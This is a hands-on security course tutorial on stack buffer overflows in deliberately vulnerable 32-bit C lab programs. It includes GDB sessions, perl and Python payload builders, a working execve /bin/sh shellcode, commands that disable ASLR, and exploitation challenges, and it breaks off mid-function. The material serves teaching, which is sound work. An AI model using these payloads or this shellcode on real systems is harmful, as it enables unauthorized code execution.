In the 06-tutorial-overflow-and-shellcode/ task there is a vuln.c source code file. In the file we use strcpy() to copy the first program argument (argv[1]) into a local variable named buffer. If we give a string longer than the buffer length (32) we cause a buffer overflow and are able to overwrite the func_ptr function pointer located just above the buffer. The vuln.c file is using a proper NUL-free, always-works shellcode that spawns a shell.
Our goal is to provide the proper command line argument in order to overflow the buffer variable and overwrite the func_ptr function pointer with the address of the shellcode variable storing the byte string shellcode.
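The shape of such an argument can be sketched in Python 3 as padding followed by a little-endian address. Several things here are assumptions rather than facts from the task: that func_ptr sits immediately after the 32-byte buffer with no gap, the helper name build_argument, and above all SHELLCODE_ADDRESS, which is a placeholder; the real address has to be looked up (for example with p/x &shellcode in GDB, as done earlier).

```python
import struct

BUFFER_SIZE = 32                # length of buffer, as stated in the text
SHELLCODE_ADDRESS = 0x0804A040  # hypothetical placeholder, NOT the real address


def build_argument(target: int, padding_length: int = BUFFER_SIZE) -> bytes:
    """Return padding bytes followed by the 32-bit little-endian target."""
    payload = b"A" * padding_length + struct.pack("<I", target)
    if b"\x00" in payload:
        # strcpy() stops copying at the first NUL byte, so such an
        # address could not be delivered through argv[1] this way.
        raise ValueError("payload contains a NUL byte")
    return payload


arg = build_argument(SHELLCODE_ADDRESS)
print(len(arg), arg[-4:].hex())
```

The NUL check mirrors the reason the task insists on a NUL-free shellcode: data copied with strcpy() is cut at the first zero byte.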
First of all let's see how the program behaves:
    $ make
    cc -m32 -Wall -fno-stack-protector -g -c -o vuln.o vuln.c
    cc -m32 -zexecstack vuln.o -o vuln
    cc -m32 -zexecstack vuln.o -o vuln
    $ ./vuln
    Usage: ./vuln string
    $ ./vuln aaa
    Do nothing, successfully!
For a short string the program performs OK and the do_nothing_successfully function stored in the func_ptr local variable is invoked.
We use the -fno-stack-protector option to disable the stack protection mechanism (also dubbed stack canary). We'll discuss more on that in the next sessions.
Let's now see what happens if we overflow the buffer. We write a lot more bytes than the buffer length (let's say 50 bytes) and we check what happens. In order to generate 50 bytes we use perl:
    $ perl -e 'print "A"x50'
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
In order to feed that input as a program argument to vuln we use shell command substitution:
    $ ./vuln $(perl -e 'print "A"x50')
    Segmentation fault
We see that now the program is sent a SIGSEGV signal. Most probably this is due to the func_ptr function pointer being overwritten. We check that using dmesg:
    $ dmesg
    [...]
    [38217.667318] vuln[11474]: segfault at 41414141 ip 0000000041414141 sp 00000000ff9475ec error 14
As shown in the dmesg output the program failed when eip is 0x41414141 (which is the AAAA string), meaning the func_ptr local variable was overwritten.
We can also check that using GDB:
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ set args $(perl -e 'print "A"x50')
gdb-peda$ start
[...]
gdb-peda$ disass
Dump of assembler code for function main:
[...]
   0x08048517 <+84>: push eax
   0x08048518 <+85>: call 0x8048350 <strcpy@plt>
   0x0804851d <+90>: add esp,0x10
[...]
gdb-peda$ b *0x08048518
Breakpoint 2 at 0x8048518: file vuln.c, line 22.
gdb-peda$ b *0x0804851d
Breakpoint 3 at 0x804851d: file vuln.c, line 22.
gdb-peda$ continue
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3)
EBX: 0xf7f9d000 --> 0x1a5da8
ECX: 0xffffd2f0 --> 0x2
EDX: 0xffffd314 --> 0xf7f9d000 --> 0x1a5da8
ESI: 0x0
EDI: 0x0
EBP: 0xffffd2d8 --> 0x0
ESP: 0xffffd290 --> 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3)
EIP: 0x8048518 (<main+85>: call 0x8048350 <strcpy@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048513 <main+80>: push eax
   0x8048514 <main+81>: lea eax,[ebp-0x2c]
   0x8048517 <main+84>: push eax
=> 0x8048518 <main+85>: call 0x8048350 <strcpy@plt>
   0x804851d <main+90>: add esp,0x10
   0x8048520 <main+93>: mov eax,DWORD PTR [ebp-0xc]
   0x8048523 <main+96>: call eax
   0x8048525 <main+98>: mov eax,0x0
Guessed arguments:
arg[0]: 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3)
arg[1]: 0xffffd550 ('A' <repeats 50 times>)
[------------------------------------stack-------------------------------------]
0000| 0xffffd290 --> 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3)
0004| 0xffffd294 --> 0xffffd550 ('A' <repeats 50 times>)
0008| 0xffffd298 --> 0xf7e03bf8 --> 0x2aa0
0012| 0xffffd29c --> 0xf7e281e3 (add ebx,0x174e1d)
0016| 0xffffd2a0 --> 0x0
0020| 0xffffd2a4 --> 0xca0000
0024| 0xffffd2a8 --> 0x1
0028| 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 2, 0x08048518 in main (argc=0x2, argv=0xffffd384) at vuln.c:22
22 strcpy(buffer, argv[1]);
gdb-peda$ x/32b buffer
0xffffd2ac: 0x21 0x83 0x04 0x08 0xeb 0xd4 0xff 0xff
0xffffd2b4: 0x2f 0x00 0x00 0x00 0x14 0x98 0x04 0x08
0xffffd2bc: 0x92 0x85 0x04 0x08 0x02 0x00 0x00 0x00
0xffffd2c4: 0x84 0xd3 0xff 0xff 0x90 0xd3 0xff 0xff
gdb-peda$ continue
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd2ac ('A' <repeats 50 times>)
EBX: 0xf7f9d000 --> 0x1a5da8
ECX: 0xffffd580 --> 0x58004141 ('AA')
EDX: 0xffffd2dc --> 0xf7004141
ESI: 0x0
EDI: 0x0
EBP: 0xffffd2d8 ("AAAAAA")
ESP: 0xffffd290 --> 0xffffd2ac ('A' <repeats 50 times>)
EIP: 0x804851d (<main+90>: add esp,0x10)
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048514 <main+81>: lea eax,[ebp-0x2c]
   0x8048517 <main+84>: push eax
   0x8048518 <main+85>: call 0x8048350 <strcpy@plt>
=> 0x804851d <main+90>: add esp,0x10
   0x8048520 <main+93>: mov eax,DWORD PTR [ebp-0xc]
   0x8048523 <main+96>: call eax
   0x8048525 <main+98>: mov eax,0x0
   0x804852a <main+103>: mov ecx,DWORD PTR [ebp-0x4]
[------------------------------------stack-------------------------------------]
0000| 0xffffd290 --> 0xffffd2ac ('A' <repeats 50 times>)
0004| 0xffffd294 --> 0xffffd550 ('A' <repeats 50 times>)
0008| 0xffffd298 --> 0xf7e03bf8 --> 0x2aa0
0012| 0xffffd29c --> 0xf7e281e3 (add ebx,0x174e1d)
0016| 0xffffd2a0 --> 0x0
0020| 0xffffd2a4 --> 0xca0000
0024| 0xffffd2a8 --> 0x1
0028| 0xffffd2ac ('A' <repeats 50 times>)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 3, 0x0804851d in main (
    argc=<error reading variable: Cannot access memory at address 0x41414141>,
    argc@entry=<error reading variable: Cannot access memory at address 0x4141413d>,
    argv=<error reading variable: Cannot access memory at address 0x41414145>,
    argv@entry=<error reading variable: Cannot access memory at address 0x4141413d>) at vuln.c:22
22 strcpy(buffer, argv[1]);
gdb-peda$ x/32b buffer
0xffffd2ac: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffd2b4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffd2bc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffd2c4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
gdb-peda$ continue
Continuing.

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x41414141 ('AAAA')
EBX: 0xf7f9d000 --> 0x1a5da8
ECX: 0xffffd580 --> 0x58004141 ('AA')
EDX: 0xffffd2dc --> 0xf7004141
ESI: 0x0
EDI: 0x0
EBP: 0xffffd2d8 ("AAAAAA")
ESP: 0xffffd29c --> 0x8048525 (<main+98>: mov eax,0x0)
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xffffd29c --> 0x8048525 (<main+98>: mov eax,0x0)
0004| 0xffffd2a0 --> 0x0
0008| 0xffffd2a4 --> 0xca0000
0012| 0xffffd2a8 --> 0x1
0016| 0xffffd2ac ('A' <repeats 50 times>)
0020| 0xffffd2b0 ('A' <repeats 46 times>)
0024| 0xffffd2b4 ('A' <repeats 42 times>)
0028| 0xffffd2b8 ('A' <repeats 38 times>)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()
gdb-peda$
In the above GDB output we've used breakpoints to stop right before and right after the call to the strcpy() function. The first 32 bytes starting at the buffer address (printed with x/32b buffer) hold leftover data before strcpy() and are filled with A (0x41) afterward. From the GDB output we now know that we overflow the buffer and also overwrite the func_ptr function pointer. We overwrite quite a lot more as well, since the main() function arguments are also clobbered:
argc=<error reading variable: Cannot access memory at address 0x41414141>, argc@entry=<error reading variable: Cannot access memory at address 0x4141413d>, argv=<error reading variable: Cannot access memory at address 0x41414145>, argv@entry=<error reading variable: Cannot access memory at address 0x4141413d>) at vuln.c:22
Of course, our aim is a carefully crafted overflow that overwrites func_ptr with exactly the value we want, that is the address of the shellcode global variable. In order to do that we need to know precisely where func_ptr is located with respect to buffer. Let's call that difference d (d = &func_ptr - &buffer). Our goal is to write d bytes into the buffer, followed by the address of the shellcode variable. So we will provide a string of d+4 bytes as the program argument.
Our steps for this to happen are:
1. Find the difference between the addresses of func_ptr and buffer. Let's call it d.
2. Find the address of shellcode.
3. Create a string of d+4 bytes consisting of d bytes of A (just padding) followed by the 4 bytes of the address of shellcode.
In order to compute the difference between func_ptr
and buffer
we need to use dynamic analysis (GDB) as the two variables are stored on the stack:
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ start
[...]
gdb-peda$ p &func_ptr
$1 = (void (**)(void)) 0xffffd2fc
gdb-peda$ p &buffer
$2 = (char (*)[32]) 0xffffd2dc
In the run above, the two variables are located at 0xffffd2fc and 0xffffd2dc. These addresses may be different on another run. The difference is 0x20, that is 32:
$ python -c 'print(0xffffd2fc-0xffffd2dc)'
32
The absolute addresses of the two variables (func_ptr and buffer) will differ from one system to another. However, the difference between the two addresses stays the same.
This was expected since the buffer stores 32 characters. However, this needn't always be the case and you need to make sure of that by (dynamic) analysis, such as the one we did with GDB.
So, d
(the difference) is 32
.
To find out the address of the shellcode
variable we use static analysis, since the variable is global and stored in the .rodata
section of the executable. We use nm
for that:
$ nm vuln | grep shellcode
080485d0 r shellcode
So the address of shellcode
that we aim to use to overwrite the func_ptr
function pointer is 0x080485d0
.
The address of the shellcode variable may differ from 0x080485d0 if the executable was built on another system or with another compiler.
We now construct the d+4
(32+4=36
) byte string to feed as the first program argument. We use perl
for that:
$ perl -e 'print "A"x32,"\xd0\x85\x04\x08"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAЅ ....
$ perl -e 'print "A"x32,"\xd0\x85\x04\x08"' | od -t x4
0000000 41414141 41414141 41414141 41414141
*
0000040 080485d0
We see that we are generating the proper byte string, filling the buffer with A
characters and then using the 4 byte address of shellcode
(\xd0\x85\x04\x08
) to overwrite the func_ptr
.
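The same byte string can also be produced from Python. The sketch below is only illustrative: the helper name build_payload is hypothetical, and the offset 32 and the address 0x080485d0 are the values measured above, which may differ on your system. The "<I" format of struct.pack emits the address as 4 bytes in little-endian order, which is what the hand-written \xd0\x85\x04\x08 sequence encodes.

```python
import struct


def build_payload(offset, target_addr, pad=b"A"):
    """Return `offset` padding bytes followed by a 32-bit little-endian address."""
    return pad * offset + struct.pack("<I", target_addr)


# Values taken from the GDB and nm runs above (they may differ on your system).
payload = build_payload(32, 0x080485d0)

# Show the payload as hex: 32 padding bytes, then the address bytes.
print(payload.hex())
```

To pass the raw bytes to the program rather than a hex dump, they would be written with sys.stdout.buffer.write(payload) instead of print().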
Let's pass that string as the first argument using shell command substitution and profit:
$ ./vuln $(perl -e 'print "A"x32,"\xd0\x85\x04\x08"')
$
Excellent, we've got a shell! We're now closer to what an attack really looks like, with the trigger step happening through a buffer overflow caused by the strcpy()
function.
Let's now get to the next step towards making the attack more realistic. We would rarely have the benefit of a function pointer (such as func_ptr
) being conveniently placed after a buffer in memory. What we usually aim to do is overwrite the function return address, point that to the shellcode (in our case the shellcode
variable) and profit!
Inside the 06-challenge-overwrite-return-address/
subfolder in the tasks archive you will find a vulnerable source code file (vuln.c
). This file has a buffer overflow vulnerability through the call of strcpy()
inside the do_nothing_successfully()
function.
Exploit this vulnerability by causing a buffer overflow of the buffer
variable and overwriting the return address of the do_nothing_successfully()
function to point to the shellcode (i.e. the address of the shellcode
variable).
Find out the address of the shellcode variable.
Use the $ebp+4 construct in GDB to find out the address where the function return address is stored.
Passing information as a program argument is one of the ways to provide input to the vulnerable program. Another way is through standard input. Let's use standard input to cause a buffer overflow and run the shellcode (again inside the shellcode
variable).
Inside the 07-challenge-use-standard-input/
subfolder in the tasks archive you will find a vulnerable source code file (vuln.c
) with a similar vulnerability to the one above: the use of strcpy()
to cause a buffer overflow inside the do_nothing_successfully()
function. There are several differences:
The input is read from standard input using fgets().
Similarly to the task above, exploit the vulnerability by causing a buffer overflow of the buffer
variable and overwriting the return address of the do_nothing_successfully()
function to point to the shellcode (i.e. the address of the shellcode
variable).
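Find out the difference between the address of the buffer variable and the address where the return address is stored in the stack frame of do_nothing_successfully(). GDB is probably the best way to do that.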
Find out the address of the shellcode
variable in the vuln
executable. nm
should be the simplest way to do that.
Create a payload to feed to the program consisting of d
(the difference) bytes of A
and then the address of the shellcode
variable. Bear in mind we are using a little endian architecture.
A first attempt to feed the payload would be a plain pipe:
perl -e 'print "A"x50...' | ./vuln
However, this doesn't work. Even if the shellcode executes and a shell is created, the pipe is closed once perl exits, so the standard input of the shell is closed as well. You can still check whether the shellcode ran by using strace.
The proper way to do this is with a command such as
cat <(perl -e 'print "A"x50...') - | ./vuln
The above command “concatenates” the output of the perl command with standard input (-). After the output of the perl command is fed to the vuln program and a shell is created, the perl process exits, but cat keeps forwarding standard input, so the shell spawned from vuln continues to receive whatever you type.
If everything works, you will not get the usual prompt ($), but any command you provide on standard input will be run by the shell.
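The idea behind cat <(...) - can also be sketched in Python: send the payload first, keep the pipe open, and only then send commands for the shell. This is a minimal sketch under assumptions: the function name run_with_payload and the delay parameter are hypothetical, and the pause is there because a program reading with buffered I/O may otherwise consume the commands together with the payload.

```python
import subprocess
import time


def run_with_payload(argv, payload, commands, delay=0.5):
    """Send payload, pause, then send commands on the same pipe; return stdout."""
    with subprocess.Popen(argv, stdin=subprocess.PIPE,
                          stdout=subprocess.PIPE) as proc:
        proc.stdin.write(payload)
        proc.stdin.flush()
        # Let the target consume the payload before more data arrives, so its
        # buffered read does not swallow the commands meant for the shell.
        time.sleep(delay)
        proc.stdin.write(commands)
        proc.stdin.close()
        # Only suitable for small outputs: everything is read at the end.
        return proc.stdout.read()
```

A call such as run_with_payload(["./vuln"], payload, b"id\n") would then play the role of the cat command above, with payload built as described in the steps.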
Now that we know how to cause a buffer overflow and trigger the execution of the shellcode, let's make another step into making things more realistic by injecting the shellcode into the program. Up until now the shellcode was conveniently stored in the shellcode
variable, which is fairly unrealistic.
Inside the 07-challenge-fill-global-variable/ subfolder in the tasks archive we have the vuln.c program that we want to exploit. Our aim is to inject the shellcode and store it in the resident_data global variable. The attack payload (consisting of the A byte padding and the address of the resident_data variable) will be stored in the input_buffer variable and then copied to the buffer variable. Both the shellcode and the payload are provided through standard input.
Similarly to the task above, exploit the vulnerability by injecting the shellcode
through standard input in the resident_data
global variable, causing a buffer overflow of the buffer
variable and overwriting the return address of the do_nothing_successfully()
function to point to the shellcode (i.e. the address of the resident_data
global variable).
The shellcode to inject is the one stored in the shellcode variable in the above tasks. You may use echo, python or perl to print it. It may help to store the shellcode in a file and feed input from that file.
When providing the shellcode for the resident_data global variable, end it with a newline (\n). fgets() needs a newline to complete.
In the above task we were in luck that we had two buffers and both were filled by feeding input to the vulnerable program (in our case, through standard input). But that's not usually the case. Let's consider the situation where the resident_data
buffer is not part of our program. Could an attack be possible? Yes, of course: we can use the input_buffer
variable both for storing the shellcode and the payload for causing the buffer overflow. This data will then be copied to the buffer
variable and we'll profit!
In the 08-tutorial-shellcode-in-stack-buffer/
subfolder in the tasks archive the vuln.c
program has the strcpy()
-based vulnerability identical to the above tasks but no “helper” buffer. We'll have to use the buffer
variable both for storing the shellcode and the payload for causing the buffer overflow.
In short, we'll have to get to a situation where we overwrite the return address of do_nothing_successfully()
function with the start address of the buffer
variable, such that we'll execute code from the buffer
variable. The contents of the buffer
variable will start with the shellcode we've used so far. We'll feed that as input to the buffer.
The steps we are going to undertake are:
1. Find d, the difference between the start of the buffer and the return address, to know how to trigger the buffer overflow. It should be identical to the one in the tasks above, but it's always good to be sure. We'll use GDB for this.
2. Find the address of the buffer variable on the stack. We'll use GDB for this as well.
3. Create the payload, consisting of:
   - n bytes of shellcode (where n is the length of the shellcode)
   - d-n bytes of A padding (where d is the above difference)
   - 4 bytes storing the address of the buffer variable (on the stack)
4. Store the payload in a file (payload), as it will be easier to inspect it afterwards.
5. Feed the payload to the vulnerable program: cat payload - | ./vuln
First of all, let's find out the difference between the address of the buffer variable and the address where the return address is stored in the do_nothing_successfully() function stack frame. We'll use GDB for that: we set a breakpoint to stop right before the strcpy() call (in the do_nothing_successfully() function) and then print the address of the buffer variable and the address where the return address is stored.
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ start
[...]
gdb-peda$ disass do_nothing_successfully
Dump of assembler code for function do_nothing_successfully:
   0x0804847b <+0>: push ebp
   0x0804847c <+1>: mov ebp,esp
   0x0804847e <+3>: sub esp,0x58
   0x08048481 <+6>: mov DWORD PTR [ebp-0xc],0x3
   0x08048488 <+13>: sub esp,0x8
   0x0804848b <+16>: push DWORD PTR [ebp+0x8]
   0x0804848e <+19>: lea eax,[ebp-0x52]
   0x08048491 <+22>: push eax
   0x08048492 <+23>: call 0x8048350 <strcpy@plt>
   0x08048497 <+28>: add esp,0x10
[...]
gdb-peda$ b *0x08048492
Breakpoint 2 at 0x8048492: file vuln.c, line 10.
gdb-peda$ continue
Continuing.
Provide input data: aaaa
[...]
Breakpoint 2, 0x08048492 in do_nothing_successfully (str=0xffffd280 "aaaa\n") at vuln.c:10
10 strcpy(buffer, str);
gdb-peda$ p &buffer
$1 = (char (*)[70]) 0xffffd216
gdb-peda$ p $ebp+4
$2 = (void *) 0xffffd26c
gdb-peda$
In GDB we've printed the address of the local buffer variable and the address where the return address is stored ($ebp+4
). These addresses may be different on your system. We'll compute the difference using Python:
$ python -c 'print(0xffffd26c-0xffffd216)'
86
As before, the difference is 86
bytes. We need to create a payload of 86+4
bytes to overwrite the return address in the do_nothing_successfully()
stack frame.
We already found out the address of the buffer variable as well: 0xffffd216
. So we're ready to create our payload. As stated above the payload will consist of:
- n bytes of shellcode (where n is the length of the shellcode)
- d-n bytes of A padding (where d is the above difference)
- 4 bytes storing the address of the buffer variable (on the stack)

Our shellcode is the one we've already used. Let's find out its length:
$ echo -en '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80' | wc -c
25
So our payload will consist of 90 bytes:
- 25 bytes of shellcode
- 86-25 = 61 bytes of A padding
- 4 bytes storing the address of the buffer variable (\x16\xd2\xff\xff)
Let's create the payload and store it in a file named payload
:
$ perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","A"x61,"\x16\xd2\xff\xff\n"' > payload
$ wc -c payload
91 payload
$ xxd payload
00000000: 31c0 5068 2f2f 7368 682f 6269 6e89 e350  1.Ph//shh/bin..P
00000010: 5389 e131 d2b0 0bcd 8041 4141 4141 4141  S..1.....AAAAAAA
00000020: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000030: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000040: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000050: 4141 4141 4141 16d2 ffff 0a              AAAAAA.....
So the payload
file now stores our payload and we can feed it to the vulnerable program.
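The payload layout described above (shellcode, then padding, then the buffer address, then a newline for fgets()) can also be assembled in Python. This is a sketch under assumptions: the function name build_stack_payload is hypothetical, and 86 and 0xffffd216 are the values measured in the GDB session above. The check for NUL and newline bytes is an addition here, motivated by the fact that strcpy() stops at a NUL byte and fgets() stops at a newline.

```python
import struct

# The 25-byte execve("/bin/sh") shellcode used throughout this session.
SHELLCODE = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
    b"\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
)


def build_stack_payload(shellcode, offset, buffer_addr):
    """Shellcode, 'A' padding up to `offset`, little-endian address, newline."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the return address")
    body = shellcode + b"A" * (offset - len(shellcode))
    body += struct.pack("<I", buffer_addr)
    # A NUL would stop strcpy() early; a newline would stop fgets() early.
    if b"\x00" in body or b"\n" in body:
        raise ValueError("payload contains a byte that truncates the copy")
    return body + b"\n"


# Values from the GDB session above; they may differ on your system.
payload = build_stack_payload(SHELLCODE, 86, 0xffffd216)
print(len(payload))
```

Writing the result to a file opened in binary mode gives the same kind of payload file as the perl command.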
We send the payload to the standard input of the vuln
program:
$ cat payload - | ./vuln
ps
Segmentation fault
We get a segmentation fault, so something went wrong. Let's check what caused the error; maybe we didn't construct the payload properly and jumped to a different address:
$ dmesg
[...]
[144777.383326] vuln[15245]: segfault at ffffd216 ip 00000000ffffd216 sp 00000000ffb71620 error 14
Nope. The address where segmentation fault occurred is OK; it's the buffer address 0xffffd216
.
Let's investigate in GDB what happens by feeding the same data to the standard input of the vuln
program:
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ run < payload
Starting program: [...]/shellcode-in-stack-buffer/vuln < payload
process 26482 is executing new program: /bin/dash
[...]
This is weird. The exploit works under GDB. There must be something different between the two environments: running in GDB and without GDB.
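There are actually two aspects: address space layout randomization (ASLR), which GDB disables by default for the program it runs, and the process environment, which differs between a GDB session and a plain shell and shifts the stack addresses.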
First of all we need to disable ASLR. We have two ways to do that:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ linux32 -3 -R bash -l
If ASLR is enabled dynamic memory areas will be placed in different locations. We can use ldd
to inspect the placing of library memory areas
$ ldd vuln
linux-gate.so.1 (0xf77a1000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf75bd000)
/lib/ld-linux.so.2 (0xf77a4000)
$ ldd vuln
linux-gate.so.1 (0xf76e4000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf7500000)
/lib/ld-linux.so.2 (0xf76e7000)
$ ldd vuln
linux-gate.so.1 (0xf77c9000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf75e5000)
/lib/ld-linux.so.2 (0xf77cc000)
In the above situation ASLR is enabled, as the load addresses of the libraries differ at each ldd
run.
After we disable ASLR (using any of the above two methods), we can see that the addresses for library functions are identical for each ldd
run:
$ ldd vuln
linux-gate.so.1 (0xb7ffd000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb7e19000)
/lib/ld-linux.so.2 (0x41000000)
$ ldd vuln
linux-gate.so.1 (0xb7ffd000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb7e19000)
/lib/ld-linux.so.2 (0x41000000)
$ ldd vuln
linux-gate.so.1 (0xb7ffd000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb7e19000)
/lib/ld-linux.so.2 (0x41000000)
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ aslr
ASLR is OFF
gdb-peda$ show disable-randomization
Disabling randomization of debuggee's virtual address space is on.
gdb-peda$ set disable-randomization off
gdb-peda$ show disable-randomization
Disabling randomization of debuggee's virtual address space is off.
gdb-peda$ aslr
ASLR is ON
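The system-wide ASLR setting can also be checked before running an exploit by reading the same /proc file that the echo command above writes to. The following is a minimal sketch: the helper names describe_aslr and read_aslr are hypothetical, and the interpretation of the values 0, 1 and 2 follows the Linux kernel sysctl documentation for randomize_va_space.

```python
# Meaning of the values in /proc/sys/kernel/randomize_va_space on Linux.
ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap and vDSO randomized",
    2: "stack, mmap, vDSO and heap (brk) randomized",
}


def describe_aslr(raw_value):
    """Translate the raw file content (e.g. '2\\n') into a description."""
    return ASLR_MODES.get(int(raw_value.strip()), "unknown")


def read_aslr(path="/proc/sys/kernel/randomize_va_space"):
    """Read and describe the current system-wide setting (Linux only)."""
    with open(path) as handle:
        return describe_aslr(handle.read())
```

Note that this reports only the system-wide value; a shell started with linux32 -3 -R has randomization disabled per process, which this file does not reflect.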
Let's now also use the same environment for GDB and for the program. To do that, we clear the environment using the env command with the -i option. Let's run the program in GDB with the cleared environment:
$ env -i gdb -q ./vuln
Reading symbols from ./vuln...done.
(gdb) show env
LINES=23
COLUMNS=80
(gdb) unset env LINES
(gdb) unset env COLUMNS
(gdb) show env
(gdb) disass do_nothing_successfully
Dump of assembler code for function do_nothing_successfully:
   0x0804847b <+0>: push %ebp
   0x0804847c <+1>: mov %esp,%ebp
   0x0804847e <+3>: sub $0x58,%esp
   0x08048481 <+6>: movl $0x3,-0xc(%ebp)
   0x08048488 <+13>: sub $0x8,%esp
   0x0804848b <+16>: pushl 0x8(%ebp)
   0x0804848e <+19>: lea -0x52(%ebp),%eax
   0x08048491 <+22>: push %eax
   0x08048492 <+23>: call 0x8048350 <strcpy@plt>
   0x08048497 <+28>: add $0x10,%esp
   0x0804849a <+31>: movzbl -0x52(%ebp),%eax
   0x0804849e <+35>: mov %eax,%edx
   0x080484a0 <+37>: sar $0x7,%dl
   0x080484a3 <+40>: shr $0x5,%dl
   0x080484a6 <+43>: add %edx,%eax
   0x080484a8 <+45>: and $0x7,%eax
   0x080484ab <+48>: sub %edx,%eax
   0x080484ad <+50>: movsbl %al,%eax
   0x080484b0 <+53>: cmp -0xc(%ebp),%eax
   0x080484b3 <+56>: jne 0x80484b9 <do_nothing_successfully+62>
   0x080484b5 <+58>: movb $0x61,-0x52(%ebp)
---Type <return> to continue, or q <return> to quit---
   0x080484b9 <+62>: leave
   0x080484ba <+63>: ret
End of assembler dump.
(gdb) b *0x08048492
Breakpoint 1 at 0x8048492: file vuln.c, line 10.
(gdb) run
Starting program: /home/razvan/projects/ctf/sss/summerschool2014.git/sessions/sess-09/skel/shellcode-in-stack-buffer/vuln
Provide input data: aaaa

Breakpoint 1, 0x08048492 in do_nothing_successfully (str=0xbffffcc0 "aaaa\n") at vuln.c:10
10 strcpy(buffer, str);
(gdb) p &buffer
$1 = (char (*)[70]) 0xbffffc56
So we now have a different address for the buffer
variable: 0xbffffc56
.
Let's try using that address for the payload:
$ perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","A"x61,"\x56\xfc\xff\xbf\n"' > payload
$ cat payload - | env -i ./vuln
ps
Segmentation fault
$ dmesg
[150008.596439] vuln[2964]: segfault at 1 ip 00000000bffffc56 sp 00000000bffffdd0 error 6
Unfortunately it still doesn't work so we will try a different approach.
The approach used here relies on the dmesg message, which shows the stack pointer (0xbffffdd0) at the time of the fault. When the fault occurs, the ret instruction has just been executed and the return address has been popped off the stack, so the stack pointer points right after the location where the return address was stored. Since the return address is stored 86 bytes above the start of the buffer, the stack pointer is 86+4=90 bytes above the start of the buffer. We compute the address of the buffer accordingly:
$ python -c 'print(hex(0xbffffdd0-90))'
0xbffffd76
We found out the buffer address: 0xbffffd76
. Let's reconstruct the payload and test our vulnerable executable:
$ perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","A"x61,"\x76\xfd\xff\xbf\n"' > payload
$ cat payload - | env -i ./vuln
ps
PID TTY TIME CMD
2682 pts/1 00:00:01 bash
14783 pts/1 00:00:00 cat
14784 pts/1 00:00:00 sh
14796 pts/1 00:00:00 ps
19602 pts/1 00:00:08 bash
Yes, we've finally done it! We've found out the address of the buffer
variable on the stack and used it to execute the shellcode.
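The address recovery from the dmesg line can be sketched in Python as well. The function name buffer_addr_from_segfault is hypothetical, and the regular expression assumes the "segfault at ... ip ... sp ... error ..." message format shown in the output above; other kernels may print the line differently.

```python
import re


def buffer_addr_from_segfault(dmesg_line, offset):
    """Derive the buffer address from the stack pointer in a segfault line.

    `offset` is the distance from the start of the buffer to the location
    where the return address is stored (86 in the walkthrough above).
    """
    match = re.search(r"\bsp ([0-9a-f]+)", dmesg_line)
    if match is None:
        raise ValueError("no stack pointer found in line")
    sp = int(match.group(1), 16)
    # ret has already popped the 4-byte return address, so sp sits
    # offset + 4 bytes above the start of the buffer.
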